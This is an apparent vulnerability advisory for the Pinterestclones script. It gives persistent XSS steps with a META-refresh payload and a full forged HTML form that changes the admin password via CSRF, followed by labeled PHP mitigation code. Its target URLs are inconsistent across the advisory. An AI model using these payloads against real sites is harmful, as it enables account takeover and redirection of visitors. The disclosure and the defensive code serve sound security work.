Title: Pinterestclones Multiple Vulnerabilities
Author: DaOne
Price: $199.99
: http://www.pinterestclones.com/
[#] [Persistent XSS]
How to test
1-Go to: http://www.bkjia.com/createusernamen/
2-Put anything in the other fields [Password & E-mail], etc.
3-Go to: Add > Upload a Pin and put the XSS code in the [Description] field. Example: <META http-equiv="refresh" content="0; URL=http://www.google.com">
4-Now anyone who goes to http://site.com/ will be redirected to google.com, or will run your XSS code.
[#] [Change the management password remotely]
<form action="http://www.2cto.com/admin/settings.php" method="post" class="niceform" name="frmname" enctype="multipart/form-data">
Name: <input type="text" class="txtFname" name="name" id="name" size="50" value="Admin"/>
User Name: <input type="text" class="txtFname" name="uname" readonly="readonly" id="uname" size="50" value="admin@pinterestclones.com"/>
New Password: <input type="password" class="txtFname" name="password" id="password" size="50" value=""/>
Confirm Password: <input type="password" class="txtFname" name="cpassword" id="cpassword" size="50" value=""/>
Site Slogan: <input type="text" name="txtSlogan" id="txtSlogan" size="50" value="Your online pinboard"/>
Site URL: <input type="text" name="txtUrl" id="txtUrl" size="50" value=""/>
Admin Email: <input type="text" name="aemail" id="aemail" size="50" value=""/>
Under maintenance: <select name="maintenance">
<option value="No" selected> No </option>
<option value="Yes"> Yes </option>
</select>
Maintenance message:
<input type="text" name="maintenancemsg" id="maintenancemsg" size="50" value="We are upgrading the site."/>
<dl class="submit">
<input type="submit" value="Save" class="submit" name="sbmtbtn" style="width: 50px;"/>
</dl>
</form>
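
Mitigation for both findings, as an added example (not code from this advisory or from the Pinterestclones product): encode the pin Description when it is output, and accept the admin settings POST only with an anti-CSRF token and the current password, neither of which is among the fields of the form above. The helper names and the `csrf` and `oldpassword` fields are assumptions.

```php
<?php
declare(strict_types=1);
// Added illustration: helper names and the csrf/oldpassword fields are hypothetical.

// Persistent XSS fix: encode the stored pin description at output time.
function render_description(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// CSRF fix, part 1: one random token per session, embedded in the settings form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// CSRF fix, part 2: accept a settings POST only with a valid token, the
// current password, and matching new-password fields.
function settings_post_allowed(array $post, array $session, string $currentHash): bool
{
    $token = $post['csrf'] ?? '';
    if (!is_string($token) || empty($session['csrf'])
        || !hash_equals($session['csrf'], $token)) {
        return false; // token missing or wrong: treat as a cross-site submission
    }
    if (!password_verify((string)($post['oldpassword'] ?? ''), $currentHash)) {
        return false; // re-authentication failed
    }
    $new = (string)($post['password'] ?? '');
    return $new !== '' && hash_equals($new, (string)($post['cpassword'] ?? ''));
}

// Constructed sample data for a stand-alone run.
$session = [];
$hash    = password_hash('old-secret', PASSWORD_DEFAULT);
$token   = csrf_token($session);

$payload = '<META http-equiv="refresh" content="0; URL=http://www.google.com">';
echo render_description($payload), PHP_EOL;

// Same fields as the advisory's form: no token, no current password.
$forged = ['uname' => 'admin@pinterestclones.com', 'password' => 'x', 'cpassword' => 'x'];
var_dump(settings_post_allowed($forged, $session, $hash));

$legit = $forged + ['csrf' => $token, 'oldpassword' => 'old-secret'];
var_dump(settings_post_allowed($legit, $session, $hash));
```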